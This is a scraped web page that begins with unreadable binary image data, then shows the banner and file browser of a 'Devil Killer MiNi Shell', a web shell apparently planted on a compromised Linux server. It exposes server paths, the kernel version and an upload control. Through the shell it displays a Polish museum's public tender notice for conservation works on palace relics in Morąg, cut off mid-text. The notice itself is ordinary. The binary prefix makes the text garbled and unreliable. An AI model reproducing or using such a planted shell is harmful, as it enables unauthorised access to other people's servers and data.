JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250801/0035812101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace konserwatorskie i budowlane reliktów pałacu Dohnów przy ul. Dąbrowskiego 54 w Morągu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM WARMII I MAZUR W OLSZTYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510989163</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zamkowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-074</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 89 527 95 96</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muzeum.olsztyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://muzeum.olsztyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace konserwatorskie i budowlane reliktów pałacu Dohnów przy ul. Dąbrowskiego 54 w Morągu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-16c98ddf-09db-4229-9188-ede065e91395</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00358121</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00048607/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wykonanie prac remontowych w obiektach Muzeum Warmii i Mazur w Olsztynie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeum-olsztyn.logintrade.net/zapytania_email,206018,0cbb167d60948b5c5000f6006144475b.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu prowadzona jest zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/><br/>2.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/><br/>3. Dokumentacja postępowania jest i w trakcie postępowania będzie upubliczniana na stronie internetowej (zwanej dalej: platformą):<br/>https://muzeum-olsztyn.logintrade.net/zapytania_email,206018,0cbb167d60948b5c5000f6006144475b.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Informacje dotyczące komunikacji za pośrednictwem Platformy:<br/>1) Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub w przypadku posiadania konta w Platformie, logując się, akceptuje warunki korzystania z Platformy, określone w Regulaminie dostępnym pod adresem: https://muzeum-olsztyn.logintrade.net/rejestracja/regulamin.html oraz uznaje go za wiążący,<br/>2) szczegółowa instrukcja obsługi platformy, zawierająca instrukcję korzystania z platformy przez wykonawcę jest zamieszczona pod adresem https://muzeum-olsztyn.logintrade.net/rejestracja/instrukcje.html,<br/><br/>3) za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę zapisania na serwerach. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy,<br/>4) numer telefonu infolinii technicznej oraz adres e-mail dotyczący Platformy: +48 71 787 35 34, pn-pt: 8:00-16:00 e-mail:<br/>helpdesk@logintrade.net,<br/><br/>2. Korzystanie z platformy możliwe jest pod warunkiem spełnienia następujących minimalnych wymagań technicznych:<br/>1) oprogramowanie zewnętrzne (dostawcy podpisu kwalifikowanego);<br/>a) Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11, Google Chrome 31. Mozilla Firefox 26. Opera<br/>18;<br/>b) lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji<br/>przeglądarek;<br/>c) system operacyjny Windows 7 i późniejsze.<br/>2) pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>c) włączona obsługa JavaScript<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>e) zainstalowany Acrobat Reader<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy;<br/>3) Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem platformy wynosi 150 MB. Za pośrednictwem<br/>Platformy można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>4) Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 150 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .7zip, .txt,. ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg;<br/>5) Informacje na temat kodowania i czasu odbioru danych:<br/>a) oferta złożona przez wykonawcę na Platformie, nie jest widoczna dla zamawiającego, ponieważ widnieje w platformie jako<br/>zaszyfrowana. Możliwość otwarcia oferty dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>składania ofert,<br/>b) czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie<br/>potwierdzone złożenie oferty, dokumentu przez Wykonawcę. W przypadku wybrania opcji złożenia oferty bez logowania,<br/>potwierdzenie odbywa się poprzez kliknięcie w link dostępny w wiadomości mailowej, wysłanej automatycznie po złożeniu oferty,<br/>dokumentu będąc niezalogowanym na Platformie. Wiadomość otrzymuje Wykonawca na adres e-mail wskazany w formularzu w<br/>ikonę „Złóż ofertę”. W przypadku Wykonawcy zalogowanego na platformie, czas przekazania danych jest to czas wysłania<br/>dokumentu, oferty przez platformę.<br/><br/>Z uwagi na ograniczoną liczbę znaków w tej sekcji ogłoszenia szczegółowe wymagania techniczne i organizacyjne dot.<br/>korespondencji elektronicznej znajdują się w SWZ w szczególności w §X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 ze zm.), dalej „RODO”, informuję, że: <br/>1)	administratorem danych osobowych Pani/Pana danych osobowych jest Muzeum Warmii i Mazur <br/>w Olsztynie z siedzibą przy ul. Zamkowa 2, 10 - 074 Olsztyn, NIP: 739-020-01-75, REGON: 510989163;<br/>2)	kontakt z administratorem danych jest możliwy listownie na powyższy adres, telefonicznie pod numerem tel. 527-95-96 lub pocztą elektroniczna na adres sekretariat@muzeum.olsztyn.pl. <br/>W sprawach z zakresu ochrony danych osobowych można kontaktować się z Inspektorem ochrony danych pisemnie na adres siedziby administratora danych lub drogą elektroniczną na adres iod@muzeum.olsztyn.pl; <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych ZP.243.5.2025 spoczywający na Muzeum jako jednostce sektora finansów publicznych,<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1-4 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych, dalej „ustawa Pzp”;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają <br/>z ustawy Pzp;<br/>7)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	przysługuje Pani/Panu prawo do żądania od administratora danych osobowych:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania <br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym <br/>z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>10)	w przypadku uznania, iż przetwarzanie przez Administratora Pani/Pana danych osobowych narusza przepisy prawa, przysługuje Pani/Panu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00- 193 Warszawa);<br/>11)	Pani/Pana dane osobowe nie będą udostępniane do państwa trzeciego ani organizacji międzynarodowej;<br/>12)	Pani/Pana dane osobowe nie będą profilowane ani też nie będą podlegały zautomatyzowanemu podejmowaniu decyzji.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.243.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 236106,07 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 154561,91 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie prac konserwatorskich i budowlanych reliktów pałacu Dohnów przy ul. Dąbrowskiego 54 w Morągu. Obejmują one wykonanie prac konserwatorskich i budowlanych służących ekspozycji odkrytych w 2023 roku reliktów pałacu Dohnów w Morągu oraz nawarstwień kulturowych w jego obrębie, to jest kanału burzowego i innych reliktów, w tym muru fundamentowego pałacu w postaci średniowiecznego, obronnego muru miejskiego. Przedmiot zamówienia nazwany jest w dalszej części SWZ „przedmiotem zamówienia”.<br/>2.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	Prace konserwatorskie reliktów ceglanych i kamiennych w dwóch pomieszczeniach parteru pałacu – pom. 1.7 i 1.9 wg dokumentacji projektowej (aut. A. Wojciechowska-Grygo, K. Polak), służące zachowaniu reliktów architektonicznych, w tym kanału, w formie skansenu architektoniczno-archeologicznego. Zakres obejmuje: <br/>a)	prace konserwatorskie murów i sklepienia kanału, w tym uzupełnienie ubytku sklepienia kanału w pom. 1.9.; <br/>b)	prace konserwatorskie posadzek sąsiadujących z kanałem;<br/>c)	prace konserwatorskie murów wydzielających wykopy z kanałem w pom. 1.7 i 1.9;<br/>d)	wykonanie podmurowania ścianek kanału i ścian obwodowych wykopu w pom. 1.9 w miejscu ubytków. Prace murarskie wykonywać materiałem dostosowanym do wyglądu i charakteru uzupełnianego fragmentu (cegłą dostosowaną wymiarem, kolorystyką i fakturą do cegły historycznej w konserwowanym elemencie; zaprawą o właściwie dobranych parametrach do wyglądu zaprawy historycznej, nie szkodzącej oryginałowi ze względu na swe parametry fizykochemiczne).<br/>e)	wykonanie zamurowania wylotu wnętrza kanału od strony dziedzińca (prace z trudnym dostępem jedynie z wnętrza kanału). Zamurowanie wylotu wnętrza kanału od strony dziedzińca należy wykonać w sposób uniemożliwiający przedostawanie się gryzoni z gruntu dziedzińca oraz negatywny wpływ wilgoci z gruntu na te zamurowanie, np. w postaci ściany warstwowej, od strony wnętrza ceglanej jak kanał, od strony gruntu z materiału możliwie odpornego na działanie wilgoci z gruntu;<br/>f)	celem konserwacji jest utrzymanie zabytkowego charakteru kanału i jego otoczenia oraz zapewnienie bezpieczeństwa jego statyki, finalnie utrzymanie cech skansenu architektoniczno-archeologicznego;<br/>g)	prace należy prowadzić pod nadzorem archeologicznym.<br/>2)	Wykonanie nadwieszonych schodów nad reliktami w pom. 1.9 (umożliwiających skomunikowanie parteru z sąsiadującą piwnicą) oraz balustrady wydzielającej ekspozycję reliktów od strony parteru, na podbudowie z konstrukcji wykonanej w 2024 roku w postaci belki stropowej oraz posadzki pomieszczenia 0.2, na podstawie dokumentacji projektowej z 2023 roku zweryfikowanej w 2024 r. (aut. A. Wojciechowska-Grygo). Balustrada całoszklana – szkło bezpieczne VSG ESG laminowane i hartowane, przezierne, odbarwione, mocowane do posadzki w klamrach zaciskowych. Schody w konstrukcji policzkowej, ażurowej (bez podstopnic), ze stopnicami, balustradami i pochwytami.<br/>3)	Wykonanie w pom. 1.7 przeszklenia na konstrukcji kładki wykonanej w 2024 roku, umożliwiającej komunikację ponad reliktami, oraz balustrad wydzielających ekspozycję reliktów od strony parteru, na podstawie dokumentacji projektowej z 2023 roku zweryfikowanej w 2024 r. (aut. A. Wojciechowska-Grygo). Balustrada całoszklana – szkło bezpieczne VSG ESG laminowane i hartowane, przezierne, odbarwione, mocowane do posadzki w klamrach zaciskowych. Szklana posadzka kładki wykonana z tafli ze szkła klejonego warstwowo. <br/>4)	Uczytelnienie gotyckiego muru obronnego w przejściu otworu drzwiowego pomiędzy pom. 1.7 i 1.9, na podstawie dokumentacji projektowej z 2023 roku zweryfikowanej w 2024 r. (aut. A. Wojciechowska-Grygo).<br/>5)	Wykonanie prac poprawiających ekspozycję reliktów dla osób zwiedzających, to jest wykonanie oświetlenia we wnętrzu kanału oraz montaż lustra, na podstawie dokumentacji projektowej z 2023 roku zweryfikowanej w 2024 r. (aut. A. Wojciechowska-Grygo). Uwaga: zasilanie do zaprojektowanego oświetlenia zostało doprowadzone w 2024 roku do wnętrza kanału (wymaga rozprowadzenia i montażu opraw).<br/>3.	Pozostałe wymogi związane z realizacją zamówienia:<br/>1)	wykonanie i przekazanie Zamawiającemu dokumentacji powykonawczej zgodnie z wymogami umowy z robót budowlanych i wchodzących w zakres zadania, w szczególności robót, które ulegają zakryciu, wyposażonej w pozytywy fotografii bądź równoważne wydruki na papierze fotograficznym, dokumentujące wszystkie etapy prac (postęp prac) oraz w wersji elektronicznej, w przypadku instalacji – także rysunkowej (zapis w formacie .doc i .pdf), w przypadku terenu także w postaci geodezyjnej mapy powykonawczej (ze zgłoszeniem do zasobu geodezyjnego i kartograficznego włącznie);<br/>2)	opracowanie dokumentacji konserwatorskiej powykonawczej zawierającej m.in. określenie zabytku; czas powstania i styl zabytku; opis; informacje o dotychczas przeprowadzonych pracach konserwatorskich oraz dokonanych przekształceniach zabytku; analizę materiałów i technik wykonania zabytku, w tym stratygrafii warstw technologicznych; opis i analizę stanu zachowania zabytku przed podjęciem prac konserwatorskich lub prac restauratorskich, z określeniem przyczyn uszkodzeń i zniszczeń; program prac konserwatorskich lub prac restauratorskich zawierający: uzasadnienie koncepcji wyglądu zabytku po przeprowadzeniu prac konserwatorskich lub prac restauratorskich, uwzględniające uwarunkowania estetyczne, historyczne i funkcjonalne, wykaz planowanych czynności i zabiegów konserwatorskich <br/>z podaniem metod, materiałów i technik (z dołączeniem kompletnych certyfikatów CE, deklaracji zgodności wraz z poświadczeniami o właściwościach technicznych zastosowanych materiałów); opis, fotografie i rysunki dokumentujące poszczególne etapy prac konserwatorskich lub prac restauratorskich, z uwzględnieniem zastosowanych metod, materiałów i technik; ustalenia naukowe wynikające z przeprowadzonych prac konserwatorskich lub prac restauratorskich; fotografie zabytku po zakończeniu prac konserwatorskich lub prac restauratorskich (w postaci pozytywów zdjęć lub równoważnych wydruków na papierze fotograficznym); zalecenia konserwatorskie dla właściciela lub posiadacza zabytku określające sposoby i metody sprawowania opieki nad zabytkiem;<br/>3)	wykonanie wszelkich niezbędnych prób, badań i sprawdzeń;<br/>4)	w trakcie realizacji zamówienia w obiekcie, w którym będą wykonywane czynności związane <br/>z realizacją przedmiotu zamówienia będą wykonywać swoje obowiązki pracownicy muzeum oraz pracownicy ochrony, a także przebywać osoby zwiedzające. Powyższe oznacza, iż wykonawca zobowiązany jest do zabezpieczenia prac w sposób zapewniający bezpieczeństwo wyżej wymienionym osobom, a ten fakt należy uwzględnić w harmonogramie prac i robót. Zamawiający informuje, że prace budowlane, wymagają wdrożenia specjalnych rozwiązań organizacyjnych, prowadzących do eliminacji zagrożenia ich zakurzeniem. Wszystkie te okoliczności należy uwzględnić w harmonogramie rzeczowo-finansowym jako załączniku do umowy, który podlega uzgodnieniu Zamawiającego. Dodatkowo, z uwagi na potrzebę ew. dodatkowego zabezpieczenia przed zniszczeniem i zabrudzeniem lub ewakuacji obiektów muzealnych należy każdorazowo z wyprzedzeniem 14 dni informować Zamawiającego o szczegółowych terminach prowadzenia prac celem uzgodnienia postępowania, przy czym należy prace etapować w taki sposób by możliwe było nieprzerwane przechowywanie w bezpiecznych warunkach zbiorów muzealnych znajdujących się w obiekcie, <br/>5)	miejsce wykonywania prac znajduje się na trasie zwiedzania muzeum. Intencją Muzeum jest powadzenie prac w sposób, który nie doprowadzi do zamknięcia tego odcinka ścieżki zwiedzania na cały okres prowadzenia prac i robót. W związku z powyższym prace należy tak zorganizować by wyłączenia w ruchu turystów były ograniczone do minimum, tj. na czas wykonania projektowanej kładki w pom. 1.7 oraz prac konserwatorskich reliktów występujących bezpośrednio pod tą kładką. Wszystkie te okoliczności należy uwzględnić w harmonogramie rzeczowo-finansowym jako załączniku do umowy, który podlega uzgodnieniu Zamawiającego.<br/>6)	jeśli będzie to niezbędne, Wykonawca może przewidzieć organizację placu budowy na utwardzonym terenie położonym od strony południowej pałacu, z dojazdem przez bramę południową. Wszelkie dostawy materiałów, transport, organizacja i przebieg budowy, nie mogą wpłynąć na stan trawników na dziedzińcu pałacu,<br/>7)	prace należy etapować w taki sposób by możliwe było nieprzerwane przechowywanie <br/>w bezpiecznych warunkach zbiorów muzealnych znajdujących się w obiekcie,<br/>8)	Wykonawca jest zobowiązany do uwzględnienia w ofercie cenowej wykonania śluz technicznych w miejscach gdzie stykają się części obiektu objęte prowadzonym przez Wykonawcę remontem <br/>z częściami nie objętymi remontem. Śluzy graniczne w miarę potrzeby mają umożliwiać założenie 